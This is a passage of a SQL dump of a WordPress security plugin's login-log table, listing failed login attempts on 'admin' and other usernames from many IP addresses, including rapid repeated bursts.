(100424, 1495951743.211253, 1, 'loginFailInvalidUsername', '{login}', 0, 3254658598, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100423, 1495949720.840608, 1, 'loginFailValidUsername', 'admin', 1, 1563679021, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100422, 1495945376.902414, 1, 'loginFailInvalidUsername', '{login}', 0, 1424919935, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100421, 1495941420.345479, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3001689384, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100420, 1495937167.795845, 1, 'loginFailValidUsername', 'admin', 1, 3415091724, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100419, 1495935071.006533, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3362989667, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100418, 1495932996.313646, 1, 'loginFailInvalidUsername', '{login}', 0, 3415089988, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100417, 1495930830.070099, 1, 'loginFailValidUsername', 'admin', 1, 3254658399, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100416, 1495928647.357970, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 529853472, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100415, 1495924494.243243, 1, 'loginFailValidUsername', 'admin', 1, 3152885982, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100414, 1495918391.135351, 1, 'loginFailValidUsername', 'admin', 1, 3254658403, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100413, 1495914378.057410, 1, 'loginFailInvalidUsername', '{login}', 0, 3387838170, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100412, 1495912251.669653, 1, 'loginFailValidUsername', 'admin', 1, 3151105913, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100411, 1495911578.419575, 1, 'loginFailInvalidUsername', 'notre', 0, 1729627112, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100410, 1495911249.272302, 1, 'loginFailInvalidUsername', 'outils', 0, 3168080791, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100409, 1495910916.993120, 1, 'loginFailValidUsername', 'admin', 1, 3555103830, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100408, 1495910371.904239, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1563679021, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100407, 1495910237.913862, 1, 'loginFailInvalidUsername', 'notre', 0, 2548839223, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100406, 1495909123.327774, 1, 'loginFailInvalidUsername', 'professionnel', 0, 2548839223, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100405, 1495909121.539816, 1, 'loginFailInvalidUsername', 'outils', 0, 2548839223, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100404, 1495906448.015291, 1, 'loginFailValidUsername', 'admin', 1, 1345746571, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100403, 1495904455.260179, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3254658391, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100402, 1495902427.221073, 1, 'loginFailInvalidUsername', '{login}', 0, 529855267, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100401, 1495900481.793921, 1, 'loginFailValidUsername', 'admin', 1, 2156323210, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100400, 1495896342.980018, 1, 'loginFailInvalidUsername', '{login}', 0, 3107039490, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100399, 1495893519.749395, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100398, 1495893519.346112, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100397, 1495893519.036474, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100396, 1495893518.725527, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100395, 1495893518.416963, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100394, 1495893518.105850, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100393, 1495893517.794111, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100392, 1495893517.482794, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100391, 1495893517.173004, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100390, 1495893516.863253, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100389, 1495893516.555423, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100388, 1495893516.246384, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100387, 1495893515.936010, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100386, 1495893515.612810, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100385, 1495893515.304021, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100384, 1495893514.995434, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100383, 1495893514.686866, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100382, 1495893514.378490, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100381, 1495893514.066037, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100380, 1495892193.568709, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2949647692, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100379, 1495884375.688956, 1, 'loginFailValidUsername', 'julie', 2, 1539836981, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36'),
(100378, 1495882369.826126, 1, 'loginFailValidUsername', 'admin', 1, 1835212158, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100377, 1495872233.301262, 1, 'loginFailInvalidUsername', '{login}', 0, 2156323210, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100376, 1495865942.783606, 1, 'loginFailInvalidUsername', '{login}', 0, 1828828346, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100375, 1495863878.814214, 1, 'loginFailValidUsername', 'admin', 1, 3170385964, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100374, 1495863759.224147, 1, 'loginFailValidUsername', 'julie', 2, 1539836981, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36'),
(100373, 1495859479.824680, 1, 'loginFailInvalidUsername', '{login}', 0, 1835212154, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100371, 1495857241.367433, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100372, 1495857241.676675, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100370, 1495857241.057824, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100369, 1495857240.746670, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100368, 1495857240.437678, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100367, 1495857240.129427, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100366, 1495857239.820632, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100365, 1495857239.509831, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100364, 1495857239.200764, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100363, 1495857238.891135, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100362, 1495857238.580597, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100361, 1495857238.265058, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100360, 1495857237.951156, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100359, 1495857237.640661, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100358, 1495857237.331723, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100357, 1495857237.022129, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100356, 1495857236.707969, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100355, 1495857236.395771, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100354, 1495857236.078681, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100353, 1495852932.961256, 1, 'loginFailInvalidUsername', '{login}', 0, 1042038966, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100352, 1495846197.428282, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3470134655, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100351, 1495841872.470910, 1, 'loginFailValidUsername', 'admin', 1, 1828725654, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100350, 1495839704.131774, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 783835753, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100349, 1495837555.488568, 1, 'loginFailInvalidUsername', '{login}', 0, 1534992972, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100348, 1495835388.938914, 1, 'loginFailValidUsername', 'admin', 1, 3397466494, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100347, 1495833372.807289, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1046956164, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100346, 1495831342.459474, 1, 'loginFailInvalidUsername', '{login}', 0, 2949647692, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100345, 1495829229.004134, 1, 'loginFailValidUsername', 'admin', 1, 1563679021, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100344, 1495827807.342046, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100343, 1495827807.032758, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100342, 1495827806.720130, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100341, 1495827806.409871, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100340, 1495827806.100097, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100339, 1495827805.788778, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100338, 1495827805.477898, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100337, 1495827805.168308, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100336, 1495827804.857771, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100335, 1495827804.548800, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100334, 1495827804.239368, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100333, 1495827803.928135, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100332, 1495827803.618539, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100331, 1495827803.306955, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100330, 1495827802.996128, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100329, 1495827802.686131, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100328, 1495827802.375993, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100327, 1495827802.064934, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100326, 1495827801.752327, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100325, 1495827571.731989, 1, 'loginFailValidUsername', 'julie', 2, 2030594922, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(100324, 1495825048.464478, 1, 'loginFailInvalidUsername', '{login}', 0, 1495116718, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100323, 1495822995.814892, 1, 'loginFailValidUsername', 'admin', 1, 781668949, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100322, 1495818679.750147, 1, 'loginFailInvalidUsername', '{login}', 0, 3387838170, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100321, 1495816486.714127, 1, 'loginFailValidUsername', 'admin', 1, 2945407100, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100320, 1495814331.707772, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1828725649, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100319, 1495812262.171206, 1, 'loginFailInvalidUsername', '{login}', 0, 1941604657, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100318, 1495808121.064227, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1835212082, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100316, 1495807151.492330, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100317, 1495808121.064226, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1835212082, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100315, 1495807151.180026, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100314, 1495807150.868078, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100313, 1495807150.556678, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100312, 1495807150.243272, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100311, 1495807149.877088, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100310, 1495807149.567416, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100309, 1495807149.250521, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100308, 1495807148.938042, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100307, 1495807148.627150, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100306, 1495807148.314604, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100305, 1495807148.001676, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100304, 1495807147.689589, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100303, 1495807147.379959, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100302, 1495807147.069475, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100301, 1495807146.753574, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100300, 1495807146.438443, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100299, 1495807146.126963, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100298, 1495807145.806355, 1, 'loginFailValidUsername', 'admin', 1, 3489067105, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(100297, 1495806054.624280, 1, 'loginFailInvalidUsername', '{login}', 0, 1845364905, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100296, 1495801673.014177, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1828828346, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100295, 1495799547.648618, 1, 'loginFailInvalidUsername', '{login}', 0, 998235371, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100294, 1495795232.077736, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3735412901, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100293, 1495793067.854757, 1, 'loginFailInvalidUsername', '{login}', 0, 3170385964, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100292, 1495788617.050800, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1042038966, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100291, 1495784050.746217, 1, 'loginFailValidUsername', 'admin', 1, 1401863434, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100290, 1495781347.928362, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3254658598, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100289, 1495779079.096273, 1, 'loginFailInvalidUsername', '{login}', 0, 3397466494, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100288, 1495776658.723332, 1, 'loginFailValidUsername', 'admin', 1, 3107039609, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100287, 1495771606.049286, 1, 'loginFailInvalidUsername', '{login}', 0, 783839564, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0');
INSERT INTO `wp_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(100286, 1495768984.075559, 1, 'loginFailValidUsername', 'admin', 1, 1828828346, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100285, 1495768502.364884, 1, 'loginFailValidUsername', 'admin', 1, 1534992972, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100284, 1495748307.344638, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Windows NT 5.2; WOW64; x64) AppleWebKit/532.87.24 (KHTML, like Gecko) Chrome/56.2.7516.1244 Safari/532.16 OPR/42.1.5794.0521'),
(100283, 1495720449.377098, 1, 'loginFailValidUsername', 'admin', 1, 1539837019, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/533.92.49 (KHTML, like Gecko) Version/5.4.9 Safari/531.84'),
(100282, 1495688389.872270, 1, 'loginFailValidUsername', 'admin', 1, 3497110456, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100281, 1495687824.927569, 1, 'loginFailInvalidUsername', 'notre', 0, 1760853483, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100280, 1495623875.847499, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1600667046, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(100279, 1495587211.376664, 1, 'loginFailInvalidUsername', 'notre', 0, 3242600154, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100278, 1495586644.606421, 1, 'loginFailInvalidUsername', 'outils', 0, 3590043248, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100277, 1495586186.837136, 1, 'loginFailValidUsername', 'admin', 1, 3497113622, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(100276, 1495585685.691431, 1, 'loginFailInvalidUsername', 'notre', 0, 1732504330, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
